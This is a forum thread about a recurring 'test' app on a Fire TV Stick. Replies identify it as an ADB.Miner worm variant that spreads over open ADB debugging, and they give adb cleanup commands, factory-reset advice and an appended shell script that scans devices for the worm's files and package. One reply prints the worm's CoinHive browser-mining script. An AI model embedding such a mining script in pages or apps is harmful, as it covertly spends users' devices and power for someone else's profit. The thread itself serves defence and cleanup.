[Malware/Virus] Solution Inside - Firestick Gen 2 - "test" app keeps popping up
Hi guys! I have a question I hope someone can help me with. I have a Gen 2 Firestick and for 2 days now this app called "test" keeps popping up at all times, and I have no clue why it's doing this. I have uninstalled the app and it comes back, and I've even tried to run the app and it tells me the app needs to be updated to run on my device, look for an updated version on my store... and yeah, the app doesn't exist on the store. What is up with this thing? I even reformatted the Firestick and within a few hours it was back and doing it again!!!! This thing is driving me nuts!!! You'll be watching a video or movie and this thing pops up and forces your video to pause and even crash. Can anyone help me?? I only have Terrarium, Turbo VPN, ES File Explorer, Mouse Toggle, and SPMC installed. The rest is all from Amazon's factory reset. I just want to block it from running or destroy it completely. You don't even have to be doing anything and it pops up, even on the home screen. Any help would be great, thank you all!! BTW, I ran a virus scan, it said it deleted it and it came back; tried a firewall, blocked it, still keeps popping up!! AURG!! Help!!
------------------------------------------------------------------Moderator Edit-------------------------------------------------------------------
Verified Solution
First reported by @azureru as malware in this post.
I have the same app on my Android Stick and it kept coming back.
Reverse engineering it - that Test app is a variation of the ADB.Miner worm that will use your device to open a webview. It opens a single HTML page that will mine Monero using CoinHive.
Code:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf', { threads: 3, throttle: 0.6 });
  miner.start();
</script>
If you have uninstalled the app on your Android and it kept coming back - make sure to disable ADB on your Android and check the other Android devices on your network for this worm.
------------------------------------------------------------------------------------------
@innovaciones provides a number of solutions - including a verified working modded .apk of the malware which renders it harmless.
I can confirm that this "Test" app is actually a virus. I reverse engineered it too, and when the Test APK auto-starts it opens a script from a "run.html" file that has the same code that azureru posted, so this is definitely an ADB.Miner. How did we get the virus? Well, I guess from sideloading sketchy apps. The main problem with this virus is that the Fire TV gets very slow because most of the performance is used for mining.
How can we get rid of this virus?
Well, first, are there other Fire TVs or Android devices in your place? If the answer is yes, then these devices could be infected too. This virus spreads using the ADB protocol, so all the devices connected to your Wi-Fi network that have the "ADB debugging" option enabled will get the virus, so it is very important that you turn off "ADB debugging" on all your Android devices.
RESET TO FACTORY SETTINGS
There are several ways to get rid of this virus. The most effective way will be resetting all your devices to factory settings; be careful next time which APKs you install, and don't forget to turn off ADB debugging when not in use.
DELETE VIRUS FILES
Using ADB, input these commands:
adb shell rm /data/local/tmp/ufo.apk
adb shell rm /data/local/tmp/lock.txt
adb shell rm /data/local/tmp/smi
adb shell rm /data/local/tmp/endat
adb shell rm /data/local/tmp/nohup
adb uninstall com.google.time.timer
adb reboot
These are some of the virus files I found, but I really don't know if deleting these files will be enough to disable the virus.
INSTALL MODDED VIRUS
If you don't want to reset to factory settings and all you want is to "turn off" the miner, then you can install the attached APK, which is a modded version of the original virus, except the run.html is a blank page (without the mining script) and the Activity names in the AndroidManifest.xml were changed so it can't start now, so pretty much the virus will think it's working but it's not.
HIDE THE VIRUS
As recommended here you could try the hide command:
pm hide com.google.time.timer
Here is more information about this kind of virus; the test virus is a variation of this:
http://blog.netlab.360.com/adb-miner-more-information-en/
I hope this information could help someone.
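Added example, not part of the original posts: a shell check that looks for the file names and the package name listed in the thread, so each Android device on the network can be triaged before and after cleanup. The helper names `find_indicators` and `scan_device` and the sample listings are constructed for illustration; the indicators themselves are only the ones named above.

```shell
#!/bin/sh
# Indicators taken from the thread: files under /data/local/tmp and the package.
IOC_FILES="ufo.apk lock.txt smi endat nohup"
IOC_PACKAGE="com.google.time.timer"

# find_indicators TMP_LISTING PACKAGE_LISTING   (hypothetical helper)
#   TMP_LISTING:     output of `adb shell ls /data/local/tmp`
#   PACKAGE_LISTING: output of `adb shell pm list packages`
# Prints one line per indicator found; returns 1 if any was found, else 0.
find_indicators() {
    # Some adb versions return CRLF line endings; strip the CRs first.
    tmp_listing=$(printf '%s\n' "$1" | tr -d '\r')
    pkg_listing=$(printf '%s\n' "$2" | tr -d '\r')
    found=0
    for f in $IOC_FILES; do
        # -x whole-line, -F fixed string: "nohup.out" must not match "nohup".
        if printf '%s\n' "$tmp_listing" | grep -qxF "$f"; then
            echo "file:/data/local/tmp/$f"
            found=1
        fi
    done
    if printf '%s\n' "$pkg_listing" | grep -qxF "package:$IOC_PACKAGE"; then
        echo "package:$IOC_PACKAGE"
        found=1
    fi
    return $found
}

# scan_device SERIAL: run the same check against a connected device.
# SERIAL is the identifier shown by `adb devices` (requires adb on PATH).
scan_device() {
    find_indicators "$(adb -s "$1" shell ls /data/local/tmp 2>/dev/null)" \
                    "$(adb -s "$1" shell pm list packages 2>/dev/null)"
}

# Constructed sample listings (not captured from a real device).
SAMPLE_TMP_INFECTED=$(printf 'ufo.apk\r\nlock.txt\r\nnohup\r\nscreenshot.png\r\n')
SAMPLE_PKGS_INFECTED=$(printf 'package:com.example.player\r\npackage:com.google.time.timer\r\n')
SAMPLE_TMP_CLEAN=$(printf 'nohup.out\nscreenshot.png\n')
SAMPLE_PKGS_CLEAN=$(printf 'package:com.example.player\npackage:com.google.time.timerpro\n')
```

A clean result only means these specific names are absent; the post itself notes that the listed files may not be the complete set.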